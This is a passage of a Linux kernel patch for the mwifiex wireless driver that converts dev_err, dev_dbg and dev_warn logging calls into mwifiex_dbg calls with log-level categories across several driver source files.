((GET_BSS_ROLE(priv) == MWIFIEX_BSS_ROLE_STA) && @@ -129,13 +130,14 @@ int mwifiex_process_tx(struct mwifiex_private *priv, struct sk_buff *skb, if (local_tx_pd) local_tx_pd->flags = 0; } - dev_dbg(adapter->dev, "data: -EBUSY is returned\n"); + mwifiex_dbg(adapter, ERROR, "data: -EBUSY is returned\n"); break; case -1: if (adapter->iface_type != MWIFIEX_PCIE) adapter->data_sent = false; - dev_err(adapter->dev, "mwifiex_write_data_async failed: 0x%X\n", - ret); + mwifiex_dbg(adapter, ERROR, + "mwifiex_write_data_async failed: 0x%X\n", + ret); adapter->dbg.num_tx_host_to_card_failure++; mwifiex_write_data_complete(adapter, skb, 0, ret); break; @@ -167,7 +169,8 @@ static int mwifiex_host_to_card(struct mwifiex_adapter *adapter, priv = mwifiex_get_priv_by_id(adapter, tx_info->bss_num, tx_info->bss_type); if (!priv) { - dev_err(adapter->dev, "data: priv not found. 
Drop TX packet\n"); + mwifiex_dbg(adapter, ERROR, + "data: priv not found. Drop TX packet\n"); adapter->dbg.num_tx_host_to_card_failure++; mwifiex_write_data_complete(adapter, skb, 0, 0); return ret; @@ -192,7 +195,7 @@ static int mwifiex_host_to_card(struct mwifiex_adapter *adapter, } switch (ret) { case -ENOSR: - dev_err(adapter->dev, "data: -ENOSR is returned\n"); + mwifiex_dbg(adapter, ERROR, "data: -ENOSR is returned\n"); break; case -EBUSY: if ((GET_BSS_ROLE(priv) == MWIFIEX_BSS_ROLE_STA) && @@ -207,13 +210,13 @@ static int mwifiex_host_to_card(struct mwifiex_adapter *adapter, atomic_add(tx_info->aggr_num, &adapter->tx_queued); else atomic_inc(&adapter->tx_queued); - dev_dbg(adapter->dev, "data: -EBUSY is returned\n"); + mwifiex_dbg(adapter, ERROR, "data: -EBUSY is returned\n"); break; case -1: if (adapter->iface_type != MWIFIEX_PCIE) adapter->data_sent = false; - dev_err(adapter->dev, "mwifiex_write_data_async failed: 0x%X\n", - ret); + mwifiex_dbg(adapter, ERROR, + "mwifiex_write_data_async failed: 0x%X\n", ret); adapter->dbg.num_tx_host_to_card_failure++; mwifiex_write_data_complete(adapter, skb, 0, ret); break; @@ -324,7 +327,7 @@ int mwifiex_write_data_complete(struct mwifiex_adapter *adapter, txq = netdev_get_tx_queue(priv->netdev, index); if (netif_tx_queue_stopped(txq)) { netif_tx_wake_queue(txq); - dev_dbg(adapter->dev, "wake queue: %d\n", index); + mwifiex_dbg(adapter, DATA, "wake queue: %d\n", index); } } done: diff --git a/drivers/net/wireless/mwifiex/uap_cmd.c b/drivers/net/wireless/mwifiex/uap_cmd.c index 3d0281190b9d..a4ae28353b6d 100644 --- a/drivers/net/wireless/mwifiex/uap_cmd.c +++ b/drivers/net/wireless/mwifiex/uap_cmd.c @@ -184,8 +184,8 @@ mwifiex_set_ht_params(struct mwifiex_private *priv, bss_cfg->ht_cap.mcs.rx_mask[1] = 0xff; break; default: - dev_warn(priv->adapter->dev, - "Unsupported RX-STBC, default to 2x2\n"); + mwifiex_dbg(priv->adapter, WARN, + "Unsupported RX-STBC, default to 2x2\n"); bss_cfg->ht_cap.mcs.rx_mask[0] = 0xff; bss_cfg->ht_cap.mcs.rx_mask[1] = 0xff; break; @@ -767,8 +767,8 @@ int mwifiex_uap_prepare_cmd(struct mwifiex_private *priv, u16 cmd_no, return -1; break; default: - dev_err(priv->adapter->dev, - "PREP_CMD: unknown cmd %#x\n", cmd_no); + mwifiex_dbg(priv->adapter, ERROR, + "PREP_CMD: unknown cmd %#x\n", cmd_no); return -1; } @@ -806,24 +806,28 @@ int mwifiex_config_start_uap(struct mwifiex_private *priv, struct mwifiex_uap_bss_param *bss_cfg) { if (mwifiex_del_mgmt_ies(priv)) - dev_err(priv->adapter->dev, "Failed to delete mgmt IEs!\n"); + mwifiex_dbg(priv->adapter, ERROR, + "Failed to delete mgmt IEs!\n"); if (mwifiex_send_cmd(priv, HostCmd_CMD_UAP_BSS_STOP, HostCmd_ACT_GEN_SET, 0, NULL, true)) { - dev_err(priv->adapter->dev, "Failed to stop the BSS\n"); + mwifiex_dbg(priv->adapter, ERROR, + "Failed to stop the BSS\n"); return -1; } if (mwifiex_send_cmd(priv, HostCmd_CMD_UAP_SYS_CONFIG, HostCmd_ACT_GEN_SET, UAP_BSS_PARAMS_I, bss_cfg, false)) { - dev_err(priv->adapter->dev, "Failed to set the SSID\n"); + mwifiex_dbg(priv->adapter, ERROR, + "Failed to set the SSID\n"); return -1; } if (mwifiex_send_cmd(priv, HostCmd_CMD_UAP_BSS_START, HostCmd_ACT_GEN_SET, 0, NULL, false)) { - dev_err(priv->adapter->dev, "Failed to start the BSS\n"); + mwifiex_dbg(priv->adapter, ERROR, + "Failed to start the BSS\n"); return -1; } diff --git a/drivers/net/wireless/mwifiex/uap_event.c b/drivers/net/wireless/mwifiex/uap_event.c index f4794cdc36d2..06ce3fe660f1 100644 --- a/drivers/net/wireless/mwifiex/uap_event.c +++ 
b/drivers/net/wireless/mwifiex/uap_event.c @@ -80,8 +80,8 @@ int mwifiex_process_uap_event(struct mwifiex_private *priv) node = mwifiex_add_sta_entry(priv, event->sta_addr); if (!node) { - dev_warn(adapter->dev, - "could not create station entry!\n"); + mwifiex_dbg(adapter, ERROR, + "could not create station entry!\n"); return -1; } @@ -128,7 +128,8 @@ int mwifiex_process_uap_event(struct mwifiex_private *priv) mwifiex_wake_up_net_dev_queue(priv->netdev, adapter); break; case EVENT_UAP_BSS_START: - dev_dbg(adapter->dev, "AP EVENT: event id: %#x\n", eventcause); + mwifiex_dbg(adapter, EVENT, + "AP EVENT: event id: %#x\n", eventcause); memcpy(priv->netdev->dev_addr, adapter->event_body + 2, ETH_ALEN); if (priv->hist_data) @@ -136,50 +137,53 @@ int mwifiex_process_uap_event(struct mwifiex_private *priv) break; case EVENT_UAP_MIC_COUNTERMEASURES: /* For future development */ - dev_dbg(adapter->dev, "AP EVENT: event id: %#x\n", eventcause); + mwifiex_dbg(adapter, EVENT, + "AP EVENT: event id: %#x\n", eventcause); break; case EVENT_AMSDU_AGGR_CTRL: ctrl = le16_to_cpu(*(__le16 *)adapter->event_body); - dev_dbg(adapter->dev, "event: AMSDU_AGGR_CTRL %d\n", ctrl); + mwifiex_dbg(adapter, EVENT, + "event: AMSDU_AGGR_CTRL %d\n", ctrl); if (priv->media_connected) { adapter->tx_buf_size = min_t(u16, adapter->curr_tx_buf_size, ctrl); - dev_dbg(adapter->dev, "event: tx_buf_size %d\n", - adapter->tx_buf_size); + mwifiex_dbg(adapter, EVENT, + "event: tx_buf_size %d\n", + adapter->tx_buf_size); } break; case EVENT_ADDBA: - dev_dbg(adapter->dev, "event: ADDBA Request\n"); + mwifiex_dbg(adapter, EVENT, "event: ADDBA Request\n"); if (priv->media_connected) mwifiex_send_cmd(priv, HostCmd_CMD_11N_ADDBA_RSP, HostCmd_ACT_GEN_SET, 0, adapter->event_body, false); break; case EVENT_DELBA: - dev_dbg(adapter->dev, "event: DELBA Request\n"); + mwifiex_dbg(adapter, EVENT, "event: DELBA Request\n"); if (priv->media_connected) mwifiex_11n_delete_ba_stream(priv, adapter->event_body); break; case EVENT_BA_STREAM_TIEMOUT: - dev_dbg(adapter->dev, "event: BA Stream timeout\n"); + mwifiex_dbg(adapter, EVENT, "event: BA Stream timeout\n"); if (priv->media_connected) { ba_timeout = (void *)adapter->event_body; mwifiex_11n_ba_stream_timeout(priv, ba_timeout); } break; case EVENT_EXT_SCAN_REPORT: - dev_dbg(adapter->dev, "event: EXT_SCAN Report\n"); + mwifiex_dbg(adapter, EVENT, "event: EXT_SCAN Report\n"); if (adapter->ext_scan) return mwifiex_handle_event_ext_scan_report(priv, adapter->event_skb->data); break; case EVENT_TX_STATUS_REPORT: - dev_dbg(adapter->dev, "event: TX_STATUS Report\n"); + mwifiex_dbg(adapter, EVENT, "event: TX_STATUS Report\n"); mwifiex_parse_tx_status_event(priv, adapter->event_body); break; case EVENT_PS_SLEEP: - dev_dbg(adapter->dev, "info: EVENT: SLEEP\n"); + mwifiex_dbg(adapter, EVENT, "info: EVENT: SLEEP\n"); adapter->ps_state = PS_STATE_PRE_SLEEP; @@ -187,12 +191,12 @@ int mwifiex_process_uap_event(struct mwifiex_private *priv) break; case EVENT_PS_AWAKE: - dev_dbg(adapter->dev, "info: EVENT: AWAKE\n"); + mwifiex_dbg(adapter, EVENT, "info: EVENT: AWAKE\n"); if (!adapter->pps_uapsd_mode && priv->media_connected && adapter->sleep_period.period) { adapter->pps_uapsd_mode = true; - dev_dbg(adapter->dev, - "event: PPS/UAPSD mode activated\n"); + mwifiex_dbg(adapter, EVENT, + "event: PPS/UAPSD mode activated\n"); } adapter->tx_lock_flag = false; if (adapter->pps_uapsd_mode && adapter->gen_null_pkt) { @@ -218,16 +222,16 @@ int mwifiex_process_uap_event(struct mwifiex_private *priv) break; case 
EVENT_CHANNEL_REPORT_RDY: - dev_dbg(adapter->dev, "event: Channel Report\n"); + mwifiex_dbg(adapter, EVENT, "event: Channel Report\n"); mwifiex_11h_handle_chanrpt_ready(priv, adapter->event_skb); break; case EVENT_RADAR_DETECTED: - dev_dbg(adapter->dev, "event: Radar detected\n"); + mwifiex_dbg(adapter, EVENT, "event: Radar detected\n"); mwifiex_11h_handle_radar_detected(priv, adapter->event_skb); break; default: - dev_dbg(adapter->dev, "event: unknown event id: %#x\n", - eventcause); + mwifiex_dbg(adapter, EVENT, + "event: unknown event id: %#x\n", eventcause); break; } diff --git a/drivers/net/wireless/mwifiex/uap_txrx.c b/drivers/net/wireless/mwifiex/uap_txrx.c index 38ac4d74c486..61c52fdf945d 100644 --- a/drivers/net/wireless/mwifiex/uap_txrx.c +++ b/drivers/net/wireless/mwifiex/uap_txrx.c @@ -103,8 +103,8 @@ static void mwifiex_uap_queue_bridged_pkt(struct mwifiex_private *priv, if ((atomic_read(&adapter->pending_bridged_pkts) >= MWIFIEX_BRIDGED_PKTS_THR_HIGH)) { - dev_err(priv->adapter->dev, - "Tx: Bridge packet limit reached. Drop packet!\n"); + mwifiex_dbg(priv->adapter, ERROR, + "Tx: Bridge packet limit reached. Drop packet!\n"); kfree_skb(skb); mwifiex_uap_cleanup_tx_queues(priv); return; @@ -153,15 +153,15 @@ static void mwifiex_uap_queue_bridged_pkt(struct mwifiex_private *priv, skb_pull(skb, hdr_chop); if (skb_headroom(skb) < MWIFIEX_MIN_DATA_HEADER_LEN) { - dev_dbg(priv->adapter->dev, - "data: Tx: insufficient skb headroom %d\n", - skb_headroom(skb)); + mwifiex_dbg(priv->adapter, ERROR, + "data: Tx: insufficient skb headroom %d\n", + skb_headroom(skb)); /* Insufficient skb headroom - allocate a new skb */ new_skb = skb_realloc_headroom(skb, MWIFIEX_MIN_DATA_HEADER_LEN); if (unlikely(!new_skb)) { - dev_err(priv->adapter->dev, - "Tx: cannot allocate new_skb\n"); + mwifiex_dbg(priv->adapter, ERROR, + "Tx: cannot allocate new_skb\n"); kfree_skb(skb); priv->stats.tx_dropped++; return; @@ -169,8 +169,9 @@ static void mwifiex_uap_queue_bridged_pkt(struct mwifiex_private *priv, kfree_skb(skb); skb = new_skb; - dev_dbg(priv->adapter->dev, "info: new skb headroom %d\n", - skb_headroom(skb)); + mwifiex_dbg(priv->adapter, INFO, + "info: new skb headroom %d\n", + skb_headroom(skb)); } tx_info = MWIFIEX_SKB_TXCB(skb); @@ -225,7 +226,8 @@ int mwifiex_handle_uap_rx_forward(struct mwifiex_private *priv, /* don't do packet forwarding in disconnected state */ if (!priv->media_connected) { - dev_err(adapter->dev, "drop packet in disconnected state.\n"); + mwifiex_dbg(adapter, ERROR, + "drop packet in disconnected state.\n"); dev_kfree_skb_any(skb); return 0; } @@ -275,10 +277,10 @@ int mwifiex_process_uap_rx_packet(struct mwifiex_private *priv, if ((le16_to_cpu(uap_rx_pd->rx_pkt_offset) + le16_to_cpu(uap_rx_pd->rx_pkt_length)) > (u16) skb->len) { - dev_err(adapter->dev, - "wrong rx packet: len=%d, offset=%d, length=%d\n", - skb->len, le16_to_cpu(uap_rx_pd->rx_pkt_offset), - le16_to_cpu(uap_rx_pd->rx_pkt_length)); + mwifiex_dbg(adapter, ERROR, + "wrong rx packet: len=%d, offset=%d, length=%d\n", + skb->len, le16_to_cpu(uap_rx_pd->rx_pkt_offset), + le16_to_cpu(uap_rx_pd->rx_pkt_length)); priv->stats.rx_dropped++; dev_kfree_skb_any(skb); return 0; @@ -287,7 +289,8 @@ int mwifiex_process_uap_rx_packet(struct mwifiex_private *priv, if (rx_pkt_type == PKT_TYPE_MGMT) { ret = mwifiex_process_mgmt_packet(priv, skb); if (ret) - dev_err(adapter->dev, "Rx of mgmt packet failed"); + mwifiex_dbg(adapter, ERROR, + "Rx of mgmt packet failed"); dev_kfree_skb_any(skb); return ret; } @@ -354,7 +357,8 @@ void 
*mwifiex_process_uap_txpd(struct mwifiex_private *priv, INTF_HEADER_LEN; if (!skb->len) { - dev_err(adapter->dev, "Tx: bad packet length: %d\n", skb->len); + mwifiex_dbg(adapter, ERROR, + "Tx: bad packet length: %d\n", skb->len); tx_info->status_code = -1; return skb->data; } diff --git a/drivers/net/wireless/mwifiex/usb.c b/drivers/net/wireless/mwifiex/usb.c index fd8027f200a0..aada93425f80 100644 --- a/drivers/net/wireless/mwifiex/usb.c +++ b/drivers/net/wireless/mwifiex/usb.c @@ -60,7 +60,6 @@ static int mwifiex_usb_submit_rx_urb(struct urb_context *ctx, int size); static int mwifiex_usb_recv(struct mwifiex_adapter *adapter, struct sk_buff *skb, u8 ep) { - struct device *dev = adapter->dev; u32 recv_type; __le32 tmp; int ret; @@ -69,13 +68,15 @@ static int mwifiex_usb_recv(struct mwifiex_adapter *adapter, mwifiex_process_hs_config(adapter); if (skb->len < INTF_HEADER_LEN) { - dev_err(dev, "%s: invalid skb->len\n", __func__); + mwifiex_dbg(adapter, ERROR, + "%s: invalid skb->len\n", __func__); return -1; } switch (ep) { case MWIFIEX_USB_EP_CMD_EVENT: - dev_dbg(dev, "%s: EP_CMD_EVENT\n", __func__); + mwifiex_dbg(adapter, EVENT, + "%s: EP_CMD_EVENT\n", __func__); skb_copy_from_linear_data(skb, &tmp, INTF_HEADER_LEN); recv_type = le32_to_cpu(tmp); skb_pull(skb, INTF_HEADER_LEN); @@ -83,11 +84,12 @@ static int mwifiex_usb_recv(struct mwifiex_adapter *adapter, switch (recv_type) { case MWIFIEX_USB_TYPE_CMD: if (skb->len > MWIFIEX_SIZE_OF_CMD_BUFFER) { - dev_err(dev, "CMD: skb->len too large\n"); + mwifiex_dbg(adapter, ERROR, + "CMD: skb->len too large\n"); ret = -1; goto exit_restore_skb; } else if (!adapter->curr_cmd) { - dev_dbg(dev, "CMD: no curr_cmd\n"); + mwifiex_dbg(adapter, WARN, "CMD: no curr_cmd\n"); if (adapter->ps_state == PS_STATE_SLEEP_CFM) { mwifiex_process_sleep_confirm_resp( adapter, skb->data, @@ -104,16 +106,19 @@ static int mwifiex_usb_recv(struct mwifiex_adapter *adapter, break; case MWIFIEX_USB_TYPE_EVENT: if (skb->len < sizeof(u32)) { - dev_err(dev, "EVENT: skb->len too small\n"); + mwifiex_dbg(adapter, ERROR, + "EVENT: skb->len too small\n"); ret = -1; goto exit_restore_skb; } skb_copy_from_linear_data(skb, &tmp, sizeof(u32)); adapter->event_cause = le32_to_cpu(tmp); - dev_dbg(dev, "event_cause %#x\n", adapter->event_cause); + mwifiex_dbg(adapter, EVENT, + "event_cause %#x\n", adapter->event_cause); if (skb->len > MAX_EVENT_SIZE) { - dev_err(dev, "EVENT: event body too large\n"); + mwifiex_dbg(adapter, ERROR, + "EVENT: event body too large\n"); ret = -1; goto exit_restore_skb; } @@ -125,14 +130,16 @@ static int mwifiex_usb_recv(struct mwifiex_adapter *adapter, adapter->event_skb = skb; break; default: - dev_err(dev, "unknown recv_type %#x\n", recv_type); + mwifiex_dbg(adapter, ERROR, + "unknown recv_type %#x\n", recv_type); return -1; } break; case MWIFIEX_USB_EP_DATA: - dev_dbg(dev, "%s: EP_DATA\n", __func__); + mwifiex_dbg(adapter, DATA, "%s: EP_DATA\n", __func__); if (skb->len > MWIFIEX_RX_DATA_BUF_SIZE) { - dev_err(dev, "DATA: skb->len too large\n"); + mwifiex_dbg(adapter, ERROR, + "DATA: skb->len too large\n"); return -1; } @@ -141,7 +148,8 @@ static int mwifiex_usb_recv(struct mwifiex_adapter *adapter, atomic_inc(&adapter->rx_pending); break; default: - dev_err(dev, "%s: unknown endport %#x\n", __func__, ep); + mwifiex_dbg(adapter, ERROR, + "%s: unknown endport %#x\n", __func__, ep); return -1; } @@ -176,8 +184,8 @@ static void mwifiex_usb_rx_complete(struct urb *urb) if (recv_length) { if (urb->status || (adapter->surprise_removed)) { - dev_err(adapter->dev, - 
"URB status is failed: %d\n", urb->status); + mwifiex_dbg(adapter, ERROR, + "URB status is failed: %d\n", urb->status); /* Do not free skb in case of command ep */ if (card->rx_cmd_ep != context->ep) dev_kfree_skb_any(skb); @@ -190,8 +198,9 @@ static void mwifiex_usb_rx_complete(struct urb *urb) status = mwifiex_usb_recv(adapter, skb, context->ep); - dev_dbg(adapter->dev, "info: recv_length=%d, status=%d\n", - recv_length, status); + mwifiex_dbg(adapter, INFO, + "info: recv_length=%d, status=%d\n", + recv_length, status); if (status == -EINPROGRESS) { mwifiex_queue_main_work(adapter); @@ -203,8 +212,8 @@ static void mwifiex_usb_rx_complete(struct urb *urb) return; } else { if (status == -1) - dev_err(adapter->dev, - "received data processing failed!\n"); + mwifiex_dbg(adapter, ERROR, + "received data processing failed!\n"); /* Do not free skb in case of command ep */ if (card->rx_cmd_ep != context->ep) @@ -212,8 +221,8 @@ static void mwifiex_usb_rx_complete(struct urb *urb) } } else if (urb->status) { if (!adapter->is_suspended) { - dev_warn(adapter->dev, - "Card is removed: %d\n", urb->status); + mwifiex_dbg(adapter, FATAL, + "Card is removed: %d\n", urb->status); adapter->surprise_removed = true; } dev_kfree_skb_any(skb); @@ -249,14 +258,17 @@ static void mwifiex_usb_tx_complete(struct urb *urb) struct mwifiex_adapter *adapter = context->adapter; struct usb_card_rec *card = adapter->card; - dev_dbg(adapter->dev, "%s: status: %d\n", __func__, urb->status); + mwifiex_dbg(adapter, INFO, + "%s: status: %d\n", __func__, urb->status); if (context->ep == card->tx_cmd_ep) { - dev_dbg(adapter->dev, "%s: CMD\n", __func__); + mwifiex_dbg(adapter, CMD, + "%s: CMD\n", __func__); atomic_dec(&card->tx_cmd_urb_pending); adapter->cmd_sent = false; } else { - dev_dbg(adapter->dev, "%s: DATA\n", __func__); + mwifiex_dbg(adapter, DATA, + "%s: DATA\n", __func__); atomic_dec(&card->tx_data_urb_pending); mwifiex_write_data_complete(adapter, context->skb, 0, urb->status ? 
-1 : 0); @@ -275,8 +287,8 @@ static int mwifiex_usb_submit_rx_urb(struct urb_context *ctx, int size) if (card->rx_cmd_ep != ctx->ep) { ctx->skb = dev_alloc_skb(size); if (!ctx->skb) { - dev_err(adapter->dev, - "%s: dev_alloc_skb failed\n", __func__); + mwifiex_dbg(adapter, ERROR, + "%s: dev_alloc_skb failed\n", __func__); return -ENOMEM; } } @@ -291,7 +303,7 @@ static int mwifiex_usb_submit_rx_urb(struct urb_context *ctx, int size) atomic_inc(&card->rx_data_urb_pending); if (usb_submit_urb(ctx->urb, GFP_ATOMIC)) { - dev_err(adapter->dev, "usb_submit_urb failed\n"); + mwifiex_dbg(adapter, ERROR, "usb_submit_urb failed\n"); dev_kfree_skb_any(ctx->skb); ctx->skb = NULL; @@ -468,7 +480,8 @@ static int mwifiex_usb_suspend(struct usb_interface *intf, pm_message_t message) adapter = card->adapter; if (unlikely(adapter->is_suspended)) - dev_warn(adapter->dev, "Device already suspended\n"); + mwifiex_dbg(adapter, WARN, + "Device already suspended\n"); mwifiex_enable_hs(adapter); @@ -519,7 +532,8 @@ static int mwifiex_usb_resume(struct usb_interface *intf) adapter = card->adapter; if (unlikely(!adapter->is_suspended)) { - dev_warn(adapter->dev, "Device already resumed\n"); + mwifiex_dbg(adapter, WARN, + "Device already resumed\n"); return 0; } @@ -578,7 +592,8 @@ static void mwifiex_usb_disconnect(struct usb_interface *intf) mwifiex_usb_free(card); - dev_dbg(adapter->dev, "%s: removing card\n", __func__); + mwifiex_dbg(adapter, FATAL, + "%s: removing card\n", __func__); mwifiex_remove_card(adapter, &add_remove_card_sem); usb_set_intfdata(intf, NULL); @@ -608,7 +623,8 @@ static int mwifiex_usb_tx_init(struct mwifiex_adapter *adapter) card->tx_cmd.urb = usb_alloc_urb(0, GFP_KERNEL); if (!card->tx_cmd.urb) { - dev_err(adapter->dev, "tx_cmd.urb allocation failed\n"); + mwifiex_dbg(adapter, ERROR, + "tx_cmd.urb allocation failed\n"); return -ENOMEM; } @@ -620,8 +636,8 @@ static int mwifiex_usb_tx_init(struct mwifiex_adapter *adapter) card->tx_data_list[i].urb = usb_alloc_urb(0, GFP_KERNEL); if (!card->tx_data_list[i].urb) { - dev_err(adapter->dev, - "tx_data_list[] urb allocation failed\n"); + mwifiex_dbg(adapter, ERROR, + "tx_data_list[] urb allocation failed\n"); return -ENOMEM; } } @@ -639,15 +655,13 @@ static int mwifiex_usb_rx_init(struct mwifiex_adapter *adapter) card->rx_cmd.urb = usb_alloc_urb(0, GFP_KERNEL); if (!card->rx_cmd.urb) { - dev_err(adapter->dev, "rx_cmd.urb allocation failed\n"); + mwifiex_dbg(adapter, ERROR, "rx_cmd.urb allocation failed\n"); return -ENOMEM; } card->rx_cmd.skb = dev_alloc_skb(MWIFIEX_RX_CMD_BUF_SIZE); - if (!card->rx_cmd.skb) { - dev_err(adapter->dev, "rx_cmd.skb allocation failed\n"); + if (!card->rx_cmd.skb) return -ENOMEM; - } if (mwifiex_usb_submit_rx_urb(&card->rx_cmd, MWIFIEX_RX_CMD_BUF_SIZE)) return -1; @@ -658,8 +672,8 @@ static int mwifiex_usb_rx_init(struct mwifiex_adapter *adapter) card->rx_data_list[i].urb = usb_alloc_urb(0, GFP_KERNEL); if (!card->rx_data_list[i].urb) { - dev_err(adapter->dev, - "rx_data_list[] urb allocation failed\n"); + mwifiex_dbg(adapter, ERROR, + "rx_data_list[] urb allocation failed\n"); return -1; } if (mwifiex_usb_submit_rx_urb(&card->rx_data_list[i], @@ -683,7 +697,8 @@ static int mwifiex_write_data_sync(struct mwifiex_adapter *adapter, u8 *pbuf, ret = usb_bulk_msg(card->udev, usb_sndbulkpipe(card->udev, ep), pbuf, *len, &actual_length, timeout); if (ret) { - dev_err(adapter->dev, "usb_bulk_msg for tx failed: %d\n", ret); + mwifiex_dbg(adapter, ERROR, + "usb_bulk_msg for tx failed: %d\n", ret); return ret; } @@ -702,7 +717,8 @@ 
static int mwifiex_read_data_sync(struct mwifiex_adapter *adapter, u8 *pbuf, ret = usb_bulk_msg(card->udev, usb_rcvbulkpipe(card->udev, ep), pbuf, *len, &actual_length, timeout); if (ret) { - dev_err(adapter->dev, "usb_bulk_msg for rx failed: %d\n", ret); + mwifiex_dbg(adapter, ERROR, + "usb_bulk_msg for rx failed: %d\n", ret); return ret; } @@ -722,13 +738,13 @@ static int mwifiex_usb_host_to_card(struct mwifiex_adapter *adapter, u8 ep, struct urb *tx_urb; if (adapter->is_suspended) { - dev_err(adapter->dev, - "%s: not allowed while suspended\n", __func__); + mwifiex_dbg(adapter, ERROR, + "%s: not allowed while suspended\n", __func__); return -1; } if (adapter->surprise_removed) { - dev_err(adapter->dev, "%s: device removed\n", __func__); + mwifiex_dbg(adapter, ERROR, "%s: device removed\n", __func__); return -1; } @@ -737,7 +753,7 @@ static int mwifiex_usb_host_to_card(struct mwifiex_adapter *adapter, u8 ep, return -EBUSY; } - dev_dbg(adapter->dev, "%s: ep=%d\n", __func__, ep); + mwifiex_dbg(adapter, INFO, "%s: ep=%d\n", __func__, ep); if (ep == card->tx_cmd_ep) { context = &card->tx_cmd; @@ -764,7 +780,8 @@ static int mwifiex_usb_host_to_card(struct mwifiex_adapter *adapter, u8 ep, atomic_inc(&card->tx_data_urb_pending); if (usb_submit_urb(tx_urb, GFP_ATOMIC)) { - dev_err(adapter->dev, "%s: usb_submit_urb failed\n", __func__); + mwifiex_dbg(adapter, ERROR, + "%s: usb_submit_urb failed\n", __func__); if (ep == card->tx_cmd_ep) { atomic_dec(&card->tx_cmd_urb_pending); } else { @@ -843,8 +860,8 @@ static int mwifiex_prog_fw_w_helper(struct mwifiex_adapter *adapter, u8 check_winner = 1; if (!firmware) { - dev_err(adapter->dev, - "No firmware image found! Terminating download\n"); + mwifiex_dbg(adapter, ERROR, + "No firmware image found! Terminating download\n"); ret = -1; goto fw_exit; } @@ -889,8 +906,9 @@ static int mwifiex_prog_fw_w_helper(struct mwifiex_adapter *adapter, MWIFIEX_USB_EP_CMD_EVENT, MWIFIEX_USB_TIMEOUT); if (ret) { - dev_err(adapter->dev, - "write_data_sync: failed: %d\n", ret); + mwifiex_dbg(adapter, ERROR, + "write_data_sync: failed: %d\n", + ret); continue; } @@ -902,8 +920,9 @@ static int mwifiex_prog_fw_w_helper(struct mwifiex_adapter *adapter, MWIFIEX_USB_EP_CMD_EVENT, MWIFIEX_USB_TIMEOUT); if (ret) { - dev_err(adapter->dev, - "read_data_sync: failed: %d\n", ret); + mwifiex_dbg(adapter, ERROR, + "read_data_sync: failed: %d\n", + ret); continue; } @@ -913,17 +932,17 @@ static int mwifiex_prog_fw_w_helper(struct mwifiex_adapter *adapter, /* check 1st firmware block resp for highest bit set */ if (check_winner) { if (le32_to_cpu(sync_fw.cmd) & 0x80000000) { - dev_warn(adapter->dev, - "USB is not the winner %#x\n", - sync_fw.cmd); + mwifiex_dbg(adapter, WARN, + "USB is not the winner %#x\n", + sync_fw.cmd); /* returning success */ ret = 0; goto cleanup; } - dev_dbg(adapter->dev, - "USB is the winner, start to download FW\n"); + mwifiex_dbg(adapter, MSG, + "start to download FW...\n"); check_winner = 0; break; @@ -931,9 +950,9 @@ static int mwifiex_prog_fw_w_helper(struct mwifiex_adapter *adapter, /* check the firmware block response for CRC errors */ if (sync_fw.cmd) { - dev_err(adapter->dev, - "FW received block with CRC %#x\n", - sync_fw.cmd); + mwifiex_dbg(adapter, ERROR, + "FW received block with CRC %#x\n", + sync_fw.cmd); ret = -1; continue; } @@ -945,8 +964,8 @@ static int mwifiex_prog_fw_w_helper(struct mwifiex_adapter *adapter, } while ((dnld_cmd != FW_HAS_LAST_BLOCK) && retries); cleanup: - dev_notice(adapter->dev, - "info: FW download over, size %d bytes\n", 
tlen); + mwifiex_dbg(adapter, MSG, + "info: FW download over, size %d bytes\n", tlen); kfree(recv_buff); kfree(fwdata); diff --git a/drivers/net/wireless/mwifiex/util.c b/drivers/net/wireless/mwifiex/util.c index 22d93af83cfe..3c0b3c1cf259 100644 --- a/drivers/net/wireless/mwifiex/util.c +++ b/drivers/net/wireless/mwifiex/util.c @@ -160,7 +160,8 @@ int mwifiex_init_shutdown_fw(struct mwifiex_private *priv, } else if (func_init_shutdown == MWIFIEX_FUNC_SHUTDOWN) { cmd = HostCmd_CMD_FUNC_SHUTDOWN; } else { - dev_err(priv->adapter->dev, "unsupported parameter\n"); + mwifiex_dbg(priv->adapter, ERROR, + "unsupported parameter\n"); return -1; } @@ -339,9 +340,9 @@ mwifiex_parse_mgmt_packet(struct mwifiex_private *priv, u8 *payload, u16 len, action_code = *(payload + sizeof(struct ieee80211_hdr) + 1); if (category == WLAN_CATEGORY_PUBLIC && action_code == WLAN_PUB_ACTION_TDLS_DISCOVER_RES) { - dev_dbg(priv->adapter->dev, - "TDLS discovery response %pM nf=%d, snr=%d\n", - ieee_hdr->addr2, rx_pd->nf, rx_pd->snr); + mwifiex_dbg(priv->adapter, INFO, + "TDLS discovery response %pM nf=%d, snr=%d\n", + ieee_hdr->addr2, rx_pd->nf, rx_pd->snr); mwifiex_auto_tdls_update_peer_signal(priv, ieee_hdr->addr2, rx_pd->snr, @@ -349,8 +350,8 @@ mwifiex_parse_mgmt_packet(struct mwifiex_private *priv, u8 *payload, u16 len, } break; default: - dev_dbg(priv->adapter->dev, - "unknown mgmt frame subytpe %#x\n", stype); + mwifiex_dbg(priv->adapter, ERROR, + "unknown mgmt frame subytpe %#x\n", stype); } return 0; @@ -372,8 +373,8 @@ mwifiex_process_mgmt_packet(struct mwifiex_private *priv, if (!priv->mgmt_frame_mask || priv->wdev.iftype == NL80211_IFTYPE_UNSPECIFIED) { - dev_dbg(priv->adapter->dev, - "do not receive mgmt frames on uninitialized intf"); + mwifiex_dbg(priv->adapter, ERROR, + "do not receive mgmt frames on uninitialized intf"); return -1; } @@ -467,13 +468,14 @@ int mwifiex_recv_packet(struct mwifiex_private *priv, struct sk_buff *skb) int mwifiex_complete_cmd(struct mwifiex_adapter *adapter, struct cmd_ctrl_node *cmd_node) { - dev_dbg(adapter->dev, "cmd completed: status=%d\n", - adapter->cmd_wait_q.status); + mwifiex_dbg(adapter, CMD, + "cmd completed: status=%d\n", + adapter->cmd_wait_q.status); *(cmd_node->condition) = true; if (adapter->cmd_wait_q.status == -ETIMEDOUT) - dev_err(adapter->dev, "cmd timeout\n"); + mwifiex_dbg(adapter, ERROR, "cmd timeout\n"); else wake_up_interruptible(&adapter->cmd_wait_q.wait); diff --git a/drivers/net/wireless/mwifiex/wmm.c b/drivers/net/wireless/mwifiex/wmm.c index 8be9d1310cde..a8ea21c3340c 100644 --- a/drivers/net/wireless/mwifiex/wmm.c +++ b/drivers/net/wireless/mwifiex/wmm.c @@ -107,7 +107,7 @@ mwifiex_wmm_allocate_ralist_node(struct mwifiex_adapter *adapter, const u8 *ra) ra_list->total_pkt_count = 0; - dev_dbg(adapter->dev, "info: allocated ra_list 